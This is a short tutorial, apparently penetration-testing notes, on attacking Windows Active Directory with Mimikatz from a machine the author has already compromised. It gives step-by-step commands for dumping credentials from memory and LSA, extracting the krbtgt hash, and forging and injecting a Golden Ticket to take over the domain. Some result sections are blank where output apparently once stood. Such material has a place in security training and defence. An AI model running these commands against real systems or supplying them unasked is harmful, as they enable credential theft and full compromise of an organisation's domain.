AD ATTACKS WITH MIMIKATZ

OVERVIEW

What is Mimikatz?

• Tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks
• Dumps credentials stored in memory.
• Just a few attacks: Credentials Dumping, Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket, Golden Ticket, Silver Ticket.

CREDENTIAL DUMPING

We will use the tool named as Mimikatz to dump credentials from a computer.

We are assuming that a computer is compromised by us and we are running this tool in that computer using the command prompt.

So firstly we will download this tool from github and we will run this tool on that computer.

Command to start: mimikatz.exe

This command will open a prompt of mimikatz where we can execute commands to dump the credentials.

Our very First command will be:

privilege::debug

We are looking for the “Privilege ‘20’ OK”

As we are dumping these credentials from the computer’s memory so,

If we do not turn on the privilege debug then we will not be able to bypass these attacks or the memory protections that are in space.

So the first attack is:

Command: sekurlsa::logonpasswords

Now we have successfully dumped all the credentials on the domain controller.

Administrator Credentials:

LSA DUMP:

lsadump::lsa /patch

GOLDEN TICKET ATTACK

If we have a Golden Ticket then we can get access to the entire domain.

We will use mimikatz.

First Command: privilege::debug

Now we will dump LSA of krbtgt

Command: lsadump::lsa /inject /name:krbtgt

Now we have successfully dumped.

To generate the golden ticket, we need SID, Hash NTLM

Command: kerberos::golden /User:Administrator(not real user) /domain:<domain name> /sid:<SID> /krbtgt:<NTLM hash> /id:500 /ptt

Here id 500 is the RID of Administrator.

ptt stands for Pass The Ticket.

The result will be:

Now we will use the Command: misc::cmd

This will open the cmd where we can utilize the session and the golden ticket.

Now we have access all over the Domain.

Now we have can access any machine on this Domain.